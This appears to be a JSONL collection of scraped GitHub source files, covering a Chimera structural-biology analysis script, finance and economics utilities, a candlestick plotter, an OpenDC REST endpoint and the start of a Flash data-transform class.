+{"seq_id":"70497383265","text":"#!/usr/bin/env python\n#\n\n# Python modules to load\nimport chimera\nimport os\t\t\t # For running OS commands\nimport subprocess \t\t# For invoking bash scripts inside this python script\nimport glob\nimport fnmatch # For gettin numbers of files\nimport shutil # For deleting existing analysis folders\nfrom shutil import copyfile\n\nfrom chimera import runCommand as rc # use 'rc' as shorthand for rc\nfrom chimera import replyobj # for emitting status messages\nfrom chimera.tkgui import saveReplyLog, clearReplyLog\n\n# Definition for ignoring hidden files, note use of sorted\ndef listdir_nohidden(path):\n return sorted(glob.glob(os.path.join(path, '*/')))\n\n#####################################################################################\n# REQUIRED VARIABLES - edit these to make point the script to PDB's\n#####################################################################################\n\n# Required variables\nthreshold = 3 # Volume threshold, in sigma\norigin = 'originIndex 0' # Insert an volume origin command here if desired\nmove = '0,0,0' # If the PDB's need moving\n#name = '28mini' # For file naming\n#res = '9.07' # Resolution for map model cross correlation\n\n#####################################################################################\n# Get to work\n#####################################################################################\n\n# Current working directory is set\ncwd = os.getcwd()\nprint('Current working diretory set:')\nprint(cwd)\n\n# Get directories inside PDB_built_final_geometry\ngeom = listdir_nohidden(cwd+\"/PDB_built_final_geometry\")\n\n# Get map info, name and resolution\nfor line in open(\"map/.map_info\"):\n if \"Map\" in line:\n print(line)\n fields = line.strip().split()\n # Array indices start at 0 unlike AWK\n print(fields[1])\n name = fields[1]\n\nfor line in open(\"map/.map_info\"):\n if \"Resolution\" in line:\n print(line)\n fields = line.strip().split()\n # Array indices start at 0 unlike AWK\n print(fields[1])\n res = fields[1]\n\n# Gather name of map found in the /map folder\nfor file in os.listdir(cwd+\"/map\"):\n if file.endswith(\".mrc\"):\n map=file\n\nshutil.rmtree(str(cwd)+'/PDB_built_final_geometry_all', ignore_errors=True)\nos.mkdir(str(cwd)+'/PDB_built_final_geometry_all')\nos.mkdir(str(cwd)+'/PDB_built_final_geometry_all/images')\nos.mkdir(str(cwd)+'/PDB_built_final_geometry_all/movies_legs')\nos.mkdir(str(cwd)+'/PDB_built_final_geometry_all/movies_cage')\nos.mkdir(str(cwd)+'/PDB_built_final_geometry_all/PDB')\n\n# Since we now make movies etc, set window size\nrc('windowsize 1000 1000')\n\n#####################################################################################\n# Open reference model for alignment against\n#####################################################################################\n\n# Open ref PDB into #0\nrc('open #0 '+str(cwd)+'/scripts/ref_PDB.pdb')\n\n#####################################################################################\n# First loop through geometry classes, then then PDB's within that geometry\n#####################################################################################\n\n# Loop through directories inside /PDB_built_final_geometry\nfor dir in geom:\n # Get information about geometry\n signature = os.path.basename(os.path.dirname(dir))\n print(dir)\n print (signature)\n\n # Gather name of PDB found in the current geometry directory\n # Note sorted is very important to make list ordered\n pdblist = [fn for fn in 
sorted(os.listdir(dir)) if fn.endswith(\".pdb\")]\n print(pdblist)\n # No of PDB's\n pdbno = len(fnmatch.filter(os.listdir(dir), '*.pdb'))\n\n # Create directory for RMSD, alignbment matrices and CC saveReplyLog\n shutil.rmtree(str(dir)+'/RMSD', ignore_errors=True)\n os.mkdir(str(dir)+'/RMSD')\n shutil.rmtree(str(dir)+'/mapCC', ignore_errors=True)\n os.mkdir(str(dir)+'/mapCC')\n os.mkdir(str(dir)+'/mapCC/matrix')\n os.mkdir(str(dir)+'/mapCC/images')\n\n # Make more appropriate view for figures, use refPDB in #0 as starting orientation\n # Save to internal view accessible by 'reset p1'\n rc ('modeldisplay #0')\n rc('reset; focus; turn y -120; turn z -15; turn x 70; focus; savepos p1')\n\n #Open structures\n for i in range(0,pdbno):\n file=str(pdblist[i])\n rc('open '+str(dir)+'/'+str(file))\n\n # Color structures because you should\n rc('color #ADD8E6 #:1-225; color #fb9a99 #:331-838; color #6a3d9a #:839-1074; color #6a3d9a #:1075-1198; color #1F78B4 #:1199-1576; color #da0048 #:1577-1675')\n rc('color white #0')\n rc('~modeldisplay #0')\n\n #####################################################################################\n # Measure angles\n #####################################################################################\n\n #\n # Currently this is implemented in 2_TS_measure_angles.py\n #\n\n #####################################################################################\n # Calulate RMSD of aligned models\n #####################################################################################\n\n # Do structural alignment\n for i in range(1,pdbno+1):\n rc('match #'+str(i)+':1500-1600@ca #0:1500-1600@ca')\n\n # Save matrix file for restoring structural alignmemnt\n rc('matrixget '+dir+'/RMSD/RMSD_alignment_matrix')\n\n # Clear reply log ready for gathering RMSD\n clearReplyLog()\n\n # Do RMSD measurements in a matrix\n for i in range(1,pdbno+1):\n for j in range(1,pdbno+1):\n rc('rmsd #'+str(i)+' #'+str(j))\n\n # Save reply log ready for calculated RMSD values\n saveReplyLog(dir+'/RMSD/RMSD.log')\n\n # Save session\n rc('~modeldisplay #; modeldisplay #0; focus; ~modeldisplay #; modeldisplay #1-#'+str(pdbno))\n rc('save '+dir+'/RMSD/RMSD_'+str(signature)+'_session.py')\n\n #####################################################################################\n # Make images of fits and set up directory with PDB's and images with geometry signature prefix\n #####################################################################################\n\n # Open map for cross-correlation and making images, into #999\n rc('open #999 '+str(cwd)+'/map/'+str(map))\n rc('volume #999 sdLevel 4 color grey transparency 0.8')\n #Save default cage and model orientation\n rc('savepos p2')\n\n # Split matrices from RMSD alignment to get map trans/rots for making images\n os.chdir(str(dir)+\"RMSD\")\n #Call shell script for parsing matrix files\n subprocess.call(str(cwd)+'/scripts/matrix/extract_alignment_matrices.sh', shell=True)\n # Return to working directory\n os.chdir(\"..\")\n\n # Gather names of map alignment matrices\n # Note sorted is very important to make list ordered\n matlist = [fn for fn in sorted(os.listdir(dir+'/mapCC/matrix')) if fn.endswith(\".mat\")]\n print(matlist)\n # No of PDB's\n matno = len(fnmatch.filter(os.listdir(dir+'/mapCC/matrix'), '*.mat'))\n\n # Loop through matrices, apply to map keeping structure in place to inspect the alignment\n rc('2dlabels create label1 color black size 40 xpos 0.75 ypos 0.93 text \"\"')\n rc('2dlabels create label2 color black size 40 xpos 
0.93 ypos 0.88 text \"\"')\n    for j in range(0,matno):\n        #Set view\n        rc('reset p2')\n        file=str(matlist[j])\n        rc('matrixset '+str(dir)+'/mapCC/matrix/'+str(file))\n        rc('modeldisplay #0')\n        rc('turn y 60; turn x 30; focus #0; scale 0.9; clip hither 30; clip yon -80')\n        rc('~modeldisplay #; modeldisplay #999; modeldisplay #'+str(j+1))\n        #Make label\n        rc('2dlabels delete label1; 2dlabels create label1 color black size 40 xpos 0.75 ypos 0.93 text \"'+str(signature)+'\"')\n        rc('2dlabels delete label2; 2dlabels create label2 color black size 40 xpos 0.93 ypos 0.88 text \"'+str(j+1)+'\"')\n        #Save image\n        file=str(pdblist[j])\n        rc('copy file '+str(dir)+'/mapCC/images/'+str(file)+'.png')\n        rc('copy file '+str(dir)+'/../../PDB_built_final_geometry_all/images/'+str(signature)+'_'+str(file)+'.png')\n        #Save image sequence for movie encoding\n        rc('copy file '+str(dir)+'/../../PDB_built_final_geometry_all/movies_legs/'+str(signature)+'_image_'+str(j+1).zfill(3)+'.png')\n        #Save PDB into directory with geometry signature prefix\n        rc('write #'+str(j+1)+' '+str(dir)+'/../../PDB_built_final_geometry_all/PDB/'+str(signature)+'_'+str(file)+'.pdb')\n        #Save this view so it can be recalled from mapCC session file, using: reset leg1, leg2, leg3 etc\n        rc('savepos leg'+str(j+1))\n        #Save an image of the cage with these geometries displayed\n        rc('reset')\n        rc('2dlabels delete label1; 2dlabels create label1 color black size 40 xpos 0.05 ypos 0.93 text \"'+str(signature)+'\"')\n        rc('2dlabels delete label2; 2dlabels create label2 color black size 40 xpos 0.05 ypos 0.88 text \"'+str(name)+'\"')\n        rc('~modeldisplay #; modeldisplay #1-'+str(pdbno)+'; modeldisplay #999')\n        rc('copy file '+str(dir)+'/../../PDB_built_final_geometry_all/movies_cage/'+str(signature)+'_image_'+str(j+1).zfill(3)+'.png')\n\n    rc('2dlabels delete label1; 2dlabels delete label2')\n\n    #Call shell script encoding movie\n    #subprocess.call(str(cwd)+'/scripts/matrix/extract_alignment_matrices.sh', shell=True)\n\n    #####################################################################################\n    # Calculate model-map cross correlation\n    #####################################################################################\n\n    # Reset positions to bring triskelia back onto original cage positions, save an image\n    rc('reset')\n    rc('~modeldisplay #; modeldisplay #1-'+str(pdbno)+'; modeldisplay #999')\n    rc('copy file '+str(dir)+'/mapCC/map_CC_'+str(signature)+'.png')\n\n    # Clear reply log ready for gathering model cross correlation\n    clearReplyLog()\n\n    # Do model-map cross correlation\n    for i in range(1,pdbno+1):\n        rc('molmap #'+str(i)+' '+str(res)+' modelId #1000')\n        rc('measure correlation #999 #1000')\n        rc('close #1000')\n\n    # Save reply log ready for measured model cross correlation\n    saveReplyLog(dir+'/mapCC/map_CC.log')\n\n    # Save session\n    rc('save '+dir+'/mapCC/map_CC_'+str(signature)+'_session.py')\n\n    #####################################################################################\n    # Close models ready for next geometry class\n    #####################################################################################\n\n    # Close structures\n    rc('close #1-#'+str(pdbno))\n\n    #####################################################################################\n    # Create leg path session for figures\n    #####################################################################################\n\n    # Gather name of leg bilds found in the current geometry directory\n    # Note sorted is very important to make list ordered\n    leglist = [fn for fn in 
sorted(os.listdir(dir+'/PDB_angles_bild')) if fn.endswith(\"leg.bild\")]\n print(leglist)\n # No of PDB's\n legno = len(fnmatch.filter(os.listdir(dir+'/PDB_angles_bild'), '*leg.bild'))\n\n #Open leg paths\n for i in range(0,legno):\n file=str(leglist[i])\n rc('open '+str(dir)+'PDB_angles_bild/'+str(file))\n\n #Apply alignment matrix\n rc('matrixset '+dir+'/RMSD/RMSD_alignment_matrix')\n\n # Save session\n rc('~modeldisplay #; modeldisplay #0; focus; ~modeldisplay #; modeldisplay #1-#'+str(legno))\n rc('save '+dir+'/RMSD/legs_'+str(signature)+'_session.py')\n\n # Close legs\n rc('close #1-#'+str(pdbno))\n\n #####################################################################################\n # Create principal component session for figures\n #####################################################################################\n\n # Gather name of leg bilds found in the current geometry directory\n # Note sorted is very important to make list ordered\n paxlist = [fn for fn in sorted(os.listdir(dir+'/PDB_angles_bild')) if fn.endswith(\"pax.bild\")]\n print(paxlist)\n # No of PDB's\n paxno = len(fnmatch.filter(os.listdir(dir+'/PDB_angles_bild'), '*pax.bild'))\n\n #Open leg paths\n for i in range(0,paxno):\n file=str(paxlist[i])\n rc('open '+str(dir)+'PDB_angles_bild/'+str(file))\n\n #Apply alignment matrix\n rc('matrixset '+dir+'/RMSD/RMSD_alignment_matrix')\n\n # Save session\n rc('~modeldisplay #; modeldisplay #0; focus; ~modeldisplay #; modeldisplay #1-#'+str(paxno))\n rc('save '+dir+'/RMSD/pax_'+str(signature)+'_session.py')\n\n # Close pax\n rc('close #1-#'+str(paxno))\n\n#####################################################################################\n# Tidy up\n#####################################################################################\n\n#Call shell script encoding movie\nos.chdir(cwd)\nsubprocess.call(str(cwd)+'/scripts/movie/movie_encode.sh', shell=True)\n\n# Close chimera when finished\nrc('stop')\n\n\n\n\n#### Depreciated movie code\n\n # Loop through matrices as above but make a movie of this\n #rc('movie record')\n #rc('2dlabels create label1 color black size 40 xpos 0.75 ypos 0.93 text \"\"')\n #rc('2dlabels create label2 color black size 40 xpos 0.93 ypos 0.88 text \"\"')\n #for k in range(0,matno):\n #rc('reset p2')\n #file=str(matlist[i])\n #rc('matrixset '+str(dir)+'/mapCC/matrix/'+str(file))\n #rc('modeldisplay #0')\n #rc('turn y 60; turn x 30; focus #0; scale 0.9; clip hither 30; clip yon -80')\n #rc('~modeldisplay #; modeldisplay #999; modeldisplay #'+str(k+1))\n #rc('2dlabels delete label1; 2dlabels create label1 color black size 40 xpos 0.75 ypos 0.93 text \"'+str(signature)+'\"')\n #rc('2dlabels delete label2; 2dlabels create label2 color black size 40 xpos 0.93 ypos 0.88 text \"'+str(k)+'\"')\n #rc('wait 10')\n #rc('movie encode output '+str(dir)+'/../../PDB_built_final_geometry_all/movies/'+str(signature)+'_movie.mp4 quality highest')\n #rc('2dlabels delete label1; 2dlabels delete label2')\n","repo_name":"kylelmorris/Morris_2019_NSMB","sub_path":"cage_modelling/36barrel/scripts/6_build_final_geometry_RMSD_mapCC.py","file_name":"6_build_final_geometry_RMSD_mapCC.py","file_ext":"py","file_size_in_byte":14031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"74366793182","text":"import argparse, time\nfrom reconhece_frente import reconhece_frente\nfrom reconhece_verso import reconhece_verso\nfrom reconhece_texto import reconhece_texto\nfrom apply_filter import apply_filter\n\n\ndef main():\n name = str(time.time()).split('.')[0]\n \n parser = argparse.ArgumentParser()\n\n parser.add_argument('-s', '--support')\n parser.add_argument('-f', '--frente')\n parser.add_argument('-v', '--verso')\n\n args = parser.parse_args()\n\n for currentArgument in args.__dict__:\n if args.__dict__[currentArgument] != None:\n if currentArgument == 'frente':\n doc_frente = args.__dict__[currentArgument]\n\n elif currentArgument == 'verso':\n doc_verso = args.__dict__[currentArgument]\n\n elif currentArgument == 'support':\n print('Help')\n\n else:\n print(f'{currentArgument} não é um argumento válido')\n\n if doc_frente and doc_verso:\n reconhece_frente(doc_frente, name)\n reconhece_verso(doc_verso, name)\n apply_filter(name)\n reconhece_texto(name)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"anthonyreis/reconhecimento_doc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"75158807263","text":"import pandas as pd\n\ndf = pd.read_csv(\"executions_fx_btc.tsv\", sep=\"\\t\")\n\ndf[\"base_price\"] = df.iloc[0][\"price\"]\ndf[\"price\"] = df[\"price\"] - df[\"base_price\"]\n# print(df)\ndf[\"date\"] = pd.to_datetime(df[\"date\"], format=\"%Y-%m-%dT%H:%M:%S.%fZ\")\ndf = df.set_index(\"date\")\n\n\ndf = df[\"price\"].resample(\"S\").mean()\ndf = df.resample(\"S\").interpolate()\n\ndfs = []\nfor i in range(1, 101):\n _df = df.rolling(i).mean()\n _df.name = str(i)\n dfs.append(_df)\n\ndf = pd.concat(dfs, axis=1)\ndf = df.reset_index()\ndf = df.drop(\"date\", axis=1)\n# print(df)\n\nfor index, row in df.iterrows():\n for i, value in enumerate(row.values):\n if not pd.isna(value):\n x = index / 10\n y = value / 1_000\n z = i / 10\n print(x, y, z, sep=\"\\t\")\n\n if index == 300:\n break","repo_name":"ShunsukeMzk/PlotterServer","sub_path":"tools/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"13213682731","text":"\nimport pandas as pd # Pandas 资料处理套件\nimport mplfinance as mpf # 绘制 K 线套件\n \n# 读取每日股价资料\n\n\nnames = ['Date', 'Adj_Close', 'Close', 'High', 'Low', 'Open', 'Volume']\ndf = pd.read_csv(r'stock2317.csv', # 每日股价资料 CSV 档\n header=None, \n names=names,\n skiprows=3, # 跳过开头三行档头标记\n index_col=None, \n delimiter=',')\ndf['Date'] = pd.to_datetime(df['Date']) # 字串转为 datetime 资料型态\ndf.set_index('Date', inplace=True) # 指定索引排序字段为 Date\ndf_adj = df.iloc[:,1:5] # 'Close', 'High', 'Low', 'Open'\n\nfrom pylab import mpl\nmpl.rcParams['font.sans-serif'] = ['SimHei']\nmpl.rcParams['axes.unicode_minus'] = False\n\n# 设定绘图颜色\nmc = mpf.make_marketcolors(\n\tup='red', # 上涨 K 棒颜色\n\tdown='green', # 下跌 K 棒颜色 \n\tedge='i', # K线线柱边缘颜色(i代表继承自up和down的颜色)\n\twick='i', # 上下影线颜色\n\tvolume='in', # 成交量长条图的颜色\n\tinherit=True) # 是否继承颜色设定\n\ns = mpf.make_mpf_style(\n\tgridaxis='both', # 格线位置\n\tgridstyle='-.', # 格线线型\n\ty_on_right=False, # y轴位置是否在右\n rc={'font.size':12, \n 'font.sans-serif':'SimHei', # 指定中文字型\n 'axes.titlesize':18,\n 'axes.labelsize':16,\n 'xtick.labelsize':12,\n 'ytick.labelsize':12},\n\tmarketcolors=mc)\n\nmpf.plot(df_adj,\n type='candle', # 指定 K 棒绘图符号格式\n title=' 鸿海2020年股价',\n ylabel='股价',\n figratio=(15, 10), # 图形大小\n figscale=1,\n xrotation=20, # 日期显示旋转角度\n style=s, # 设定绘图风格\n show_nontrading=False) # 是否显示无交易日\n","repo_name":"pony0613/Binance-Trading-Bot","sub_path":"kline.py","file_name":"kline.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7226872378","text":"import numpy as np\nfrom numba import njit, guvectorize\n\n\ndef set_parameters(r=0.05, beta=0.94, sigma=2.0, sigma_eps=0.5, N_eps=7, N_a=200, amax=1000):\n \"\"\"\n Defines the main parameters of the model.\n \"\"\"\n params = dict()\n\n # INTEREST RATE\n params['r'] = r\n\n # PREFERENCES\n params['sigma'] = sigma # Inverse elasticity of substitution\n params['beta'] = beta # Subjective discount factor\n\n # IDIOSYNCRATIC PRODUCTIVITY\n params['rho_eps'] = 0.5\n params['sigma_eps'] = sigma_eps\n params['N_eps'] = N_eps # Number of idiosyncatic states (epsilon)\n params['y_eps'], params['pi_eps'], params['Pi_eps'] = markov_incomes(\n rho=params['rho_eps'], sigma_y=params['sigma_eps'], N=params['N_eps'])\n\n # ASSET GRID\n params['N_a'] = N_a # Number of grid points\n params['amax'] = amax # Maximum value of the grid\n params['a'] = agrid(amin=0.0, amax=params['amax'], N=params['N_a']) # Borrowing limit and asset grid\n\n return params\n\n\n@guvectorize(['void(float64[:], float64[:], float64[:], float64[:])'], '(n),(nq),(n)->(nq)')\ndef interpolate_y(x, xq, y, yq):\n \"\"\"\n Efficient linear interpolation exploiting monotonicity.\n\n Complexity O(n+nq), so most efficient when x and xq have comparable number of points.\n Extrapolates linearly when xq out of domain of x.\n\n Parameters\n ----------\n x: array\n ascending data points\n xq: array\n ascending query points\n y: array\n data points\n yq: array\n empty to be filled with interpolated points\n \"\"\"\n nxq, nx = xq.shape[0], x.shape[0]\n\n xi = 0\n x_low = x[0]\n x_high = x[1]\n for xqi_cur in range(nxq):\n xq_cur = xq[xqi_cur]\n while xi < nx - 2:\n if x_high >= xq_cur:\n break\n xi += 1\n x_low = x_high\n x_high = x[xi + 1]\n\n xqpi_cur = (x_high - xq_cur) / (x_high - x_low)\n yq[xqi_cur] = xqpi_cur * y[xi] + (1 - xqpi_cur) * y[xi + 1]\n\n\n@guvectorize(['void(float64[:], float64[:], uint32[:], float64[:])'], '(n),(nq)->(nq),(nq)')\ndef interpolate_coord(x, xq, xqi, xqpi):\n \"\"\"\n Efficient linear interpolation exploiting monotonicity. 
xq = xqpi * x[xqi] + (1-xqpi) * x[xqi+1]\n\n    Parameters\n    ----------\n    x: array\n        ascending data points\n    xq: array\n        ascending query points\n    xqi: array\n        empty to be filled with indices of lower bracketing gridpoints\n    xqpi: array\n        empty to be filled with weights on lower bracketing gridpoints\n\n    \"\"\"\n    nxq, nx = xq.shape[0], x.shape[0]\n\n    xi = 0\n    x_low = x[0]\n    x_high = x[1]\n    for xqi_cur in range(nxq):\n        xq_cur = xq[xqi_cur]\n        while xi < nx - 2:\n            if x_high >= xq_cur:\n                break\n            xi += 1\n            x_low = x_high\n            x_high = x[xi + 1]\n\n        xqpi[xqi_cur] = (x_high - xq_cur) / (x_high - x_low)\n        xqi[xqi_cur] = xi\n\n\n@njit(fastmath=True)\ndef forward_step(D, Pi_T, a_pol_i, a_pol_pi):\n    \"\"\"\n    Single forward step to update distribution using an arbitrary asset policy.\n\n    Efficient implementation of D_t = Lam_{t-1}' @ D_{t-1} using sparsity of Lam_{t-1}.\n\n    Parameters\n    ----------\n    D: np.ndarray\n        Beginning-of-period distribution over s_t, a_(t-1)\n    Pi_T: np.ndarray\n        Transpose Markov matrix that maps s_t to s_(t+1)\n    a_pol_i: np.ndarray\n        Left gridpoint of asset policy\n    a_pol_pi: np.ndarray\n        Weight on left gridpoint of asset policy\n\n    Returns\n    ----------\n    Dnew : np.ndarray\n        Beginning-of-next-period dist s_(t+1), a_t\n\n    \"\"\"\n    # first create Dnew from updating asset state\n    Dnew = np.zeros((D.shape[0], D.shape[1]))\n    for s in range(D.shape[0]):\n        for i in range(D.shape[1]):\n            apol = a_pol_i[s, i]\n            api = a_pol_pi[s, i]\n            d = D[s, i]\n            Dnew[s, apol] += d * api\n            Dnew[s, apol + 1] += d * (1 - api)\n\n    # then use transpose Markov matrix to update income state\n    Dnew = Pi_T @ Dnew\n\n    return Dnew\n\n\ndef markov_rouwenhorst(rho, sigma, N=7):\n    \"\"\"\n    Rouwenhorst method to discretize an AR(1) process\n    \"\"\"\n    # parametrize Rouwenhorst for n=2\n    p = (1 + rho) / 2\n    Pi = np.array([[p, 1 - p], [1 - p, p]])\n\n    # implement recursion to build from n=3 to n=N\n    for n in range(3, N + 1):\n        P1, P2, P3, P4 = (np.zeros((n, n)) for _ in range(4))\n        P1[:-1, :-1] = p * Pi\n        P2[:-1, 1:] = (1 - p) * Pi\n        P3[1:, :-1] = (1 - p) * Pi\n        P4[1:, 1:] = p * Pi\n        Pi = P1 + P2 + P3 + P4\n        Pi[1:-1] /= 2\n\n    # invariant distribution and scaling\n    pi = stationary(Pi)\n    s = np.linspace(-1, 1, N)\n    s *= (sigma / np.sqrt(var(s, pi)))\n\n    return s, pi, Pi\n\n\ndef markov_incomes(rho, sigma_y, N=11):\n    \"\"\"\n    Simple helper method that assumes an AR(1) process in logs for incomes and scales aggregate income\n    to 1; note that sigma_y is the *cross-sectional* sd of log incomes\n    \"\"\"\n    sigma = sigma_y * np.sqrt(1 - rho ** 2)\n    s, pi, Pi = markov_rouwenhorst(rho, sigma, N)\n    y = np.exp(s) / np.sum(pi * np.exp(s))\n    return y, pi, Pi\n\n\ndef mean(x, pr):\n    pr = pr / np.sum(pr)\n    return np.sum(pr * x)\n\n\ndef cov(x, y, pr):\n    pr = pr / np.sum(pr)\n    return np.sum(pr * (x - mean(x, pr)) * (y - mean(y, pr)))\n\n\ndef var(x, pr):\n    pr = pr / np.sum(pr)\n    return cov(x, x, pr)\n\n\ndef ineq(ss, pop):\n    \"\"\"\n    Inequality statistics.\n    \"\"\"\n    T, Neps, Na = ss['a'].shape\n    a_flat = ss['a'].reshape(T, 1, Neps * Na).squeeze() # reshape multi-dimensional policies\n    Dst_flat = ss['D'].reshape(T, 1, Neps * Na).squeeze() # flatten out the joint distribution\n\n    # Lorenz curves\n    a = np.einsum('js,js->s', pop.pi[:, np.newaxis], a_flat)\n    p = np.einsum('js,js->s', pop.pi[:, np.newaxis], Dst_flat)\n    p = p / np.sum(p) # Make sure sums to one\n    a_sorted = np.sort(a) # Sort vectors from lowest to highest\n    a_sorted_i = np.argsort(a)\n    p_a_sorted = p[a_sorted_i] # Recover associated probabilities\n    lorenz_a_pctl, lorenz_a = 
lorenz(a_sorted, p_a_sorted) # Get Lorenz curves\n\n return lorenz_a_pctl, lorenz_a\n\n\ndef lorenz(x, pr):\n \"\"\"\n Returns Lorenz curve.\n \"\"\"\n # first do percentiles of the total population\n pctl = np.concatenate(([0], pr.cumsum() - pr / 2, [1]))\n # now do percentiles of total wealth (returns only zeros if sum(pr*x) = 0)\n wealthshare = (x * pr / np.sum(x * pr) if np.sum(x * pr) != 0 else np.zeros_like(x))\n wealthpctl = np.concatenate(([0], wealthshare.cumsum() - wealthshare / 2, [1]))\n return pctl, wealthpctl\n\n\ndef find_nearest(array, value):\n array = np.asarray(array)\n return (np.abs(array - value)).argmin()\n\n\ndef agrid(amax, N, amin=0):\n \"\"\"\n Grid a+pivot evenly log-spaced between amin+pivot and amax+pivot\n \"\"\"\n pivot = np.abs(amin) + 0.25\n a = np.geomspace(amin + pivot, amax + pivot, N) - pivot\n a[0] = amin # make sure *exactly* equal to amin\n\n return a\n\n\n@njit\ndef within_tolerance(x1, x2, tol):\n \"\"\"\n Efficiently test max(abs(x1-x2)) <= tol for arrays of same dimensions x1, x2.\n \"\"\"\n y1 = x1.ravel()\n y2 = x2.ravel()\n for i in range(y1.shape[0]):\n if np.abs(y1[i] - y2[i]) > tol:\n return False\n return True\n\n\ndef stationary(Pi, pi_seed=None, tol=1E-11, maxit=10_000):\n \"\"\"\n Find invariant distribution of a Markov chain by iteration.\n \"\"\"\n if pi_seed is None:\n pi = np.ones(Pi.shape[0]) / Pi.shape[0]\n else:\n pi = pi_seed\n\n for it in range(maxit):\n pi_new = pi @ Pi\n if within_tolerance(pi_new, pi, tol):\n break\n pi = pi_new\n else:\n raise ValueError(f'No convergence after {maxit} forward iterations!')\n pi = pi_new\n\n return pi\n\n\ndef make_path(x, T):\n \"\"\"\n Takes in x as either a number, a vector or a matrix, turning it into a path.\n \"\"\"\n x = np.asarray(x)\n if x.ndim <= 1:\n return np.tile(x, (T, 1))\n\n elif x.ndim == 2:\n return np.tile(x, (T, 1, 1))\n\n\ndef make_full_path(x, T):\n \"\"\"\n Takes a path x (vector/matrix), and repeats the last line until x has T lines.\n \"\"\"\n if x.ndim == 1:\n raise ValueError('x must be a column vector')\n\n if T < x.shape[0]:\n raise ValueError('T must be greater than the number of lines in x')\n\n return np.vstack((x, make_path(x[-1], T - x.shape[0])))\n\n\ndef pack_jacobians(jacdict, inputs, outputs, T):\n \"\"\"\n If we have T*T jacobians from nI inputs to nO outputs in jacdict, combine into (nO*T)*(nI*T) jacobian matrix.\n \"\"\"\n nI, nO = len(inputs), len(outputs)\n\n outjac = np.empty((nO * T, nI * T))\n for iO in range(nO):\n subdict = jacdict.get(outputs[iO], {})\n for iI in range(nI):\n outjac[(T * iO):(T * (iO + 1)), (T * iI):(T * (iI + 1))] = make_matrix(\n subdict.get(inputs[iI], np.zeros((T, T))), T)\n return outjac\n\n\ndef unpack_jacobians(bigjac, inputs, outputs, T):\n \"\"\"\n If we have an (nO*T)*(nI*T) jacobian and provide names of nO outputs and nI inputs, output nested dictionary\n \"\"\"\n nI, nO = len(inputs), len(outputs)\n\n jacdict = {}\n for iO in range(nO):\n jacdict[outputs[iO]] = {}\n for iI in range(nI):\n jacdict[outputs[iO]][inputs[iI]] = bigjac[(T * iO):(T * (iO + 1)), (T * iI):(T * (iI + 1))]\n return jacdict\n\n\ndef make_matrix(A, T):\n \"\"\"\n If A is not an outright ndarray, e.g. 
it is SimpleSparse, call its .matrix(T) method\n to convert it to T*T array.\n \"\"\"\n if not isinstance(A, np.ndarray):\n return A.matrix(T)\n else:\n return A\n\n\ndef pack_vectors(vs, names, T):\n v = np.zeros(len(names)*T)\n for i, name in enumerate(names):\n if name in vs:\n v[i*T:(i+1)*T] = vs[name]\n return v\n\n\ndef unpack_vectors(v, names, T):\n vs = {}\n for i, name in enumerate(names):\n vs[name] = v[i*T:(i+1)*T]\n return vs\n","repo_name":"FredericMartenet/OLGHA","sub_path":"model/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9920,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"7"}
+{"seq_id":"8927581840","text":"from opendc.models.cpu import CPU\nfrom opendc.util import exceptions\nfrom opendc.util.rest import Response\n\n\ndef GET(request):\n \"\"\"Get the specs of a CPU.\"\"\"\n\n # Make sure required parameters are there\n\n try:\n request.check_required_parameters(\n path={\n 'id': 'int'\n }\n )\n\n except exceptions.ParameterError as e:\n return Response(400, e.message)\n\n # Instantiate a CPU and make sure it exists\n\n cpu = CPU.from_primary_key((request.params_path['id'],))\n\n if not cpu.exists():\n return Response(404, '{} not found.'.format(cpu))\n\n # Return this CPU\n\n return Response(\n 200,\n 'Successfully retrieved {}.'.format(cpu),\n cpu.to_JSON()\n )\n","repo_name":"atlarge-research/opendc-web-server","sub_path":"opendc/api/v1/specifications/cpus/id/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"}
+{"seq_id":"33534647505","text":"\"\"\"\nGiven n as input, print the following pattern.\nInput: n=4\nOutput:\ny1 \ny1y2 \ny1y2y3 \ny1y2y3y4\n\"\"\"\n\nn = 4\npt = \"y\"\nst = \"\"\nfor i in range (1, n+1):\n st = st + pt + str(i)\n print(st)\nprint(\"---\")\n\n","repo_name":"enigmatic-cipher/JPR-M1-Task-1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"44024870100","text":"import inspect\nfrom dataclasses import dataclass\nfrom functools import partial\nfrom typing import Any, Callable, Dict, List, Optional, Sequence, Tuple\n\nfrom pytorch_lightning.utilities import rank_zero_warn\nfrom pytorch_lightning.utilities.enums import LightningEnum\n\nfrom flash.core.data.callback import ControlFlow\nfrom flash.core.data.utilities.collate import default_collate\nfrom flash.core.data.utils import _STAGES_PREFIX\nfrom flash.core.utilities.stages import RunningStage\nfrom flash.core.utilities.types import INPUT_TRANSFORM_TYPE\n\n\nclass InputTransformPlacement(LightningEnum):\n PER_SAMPLE_TRANSFORM = \"per_sample_transform\"\n PER_BATCH_TRANSFORM = \"per_batch_transform\"\n COLLATE = \"collate\"\n PER_SAMPLE_TRANSFORM_ON_DEVICE = \"per_sample_transform_on_device\"\n PER_BATCH_TRANSFORM_ON_DEVICE = \"per_batch_transform_on_device\"\n\n\nINVALID_STAGES_FOR_INPUT_TRANSFORMS = [RunningStage.SANITY_CHECKING, RunningStage.TUNING]\n\n\n@dataclass\nclass _InputTransformPerStage:\n collate_in_worker: bool\n transforms: Optional[Dict[str, Callable]] = None\n\n\n@dataclass\nclass InputTransform:\n def __post_init__(self):\n self.callbacks: Optional[List] = None\n\n # used to keep track of provided transforms\n self._transform: 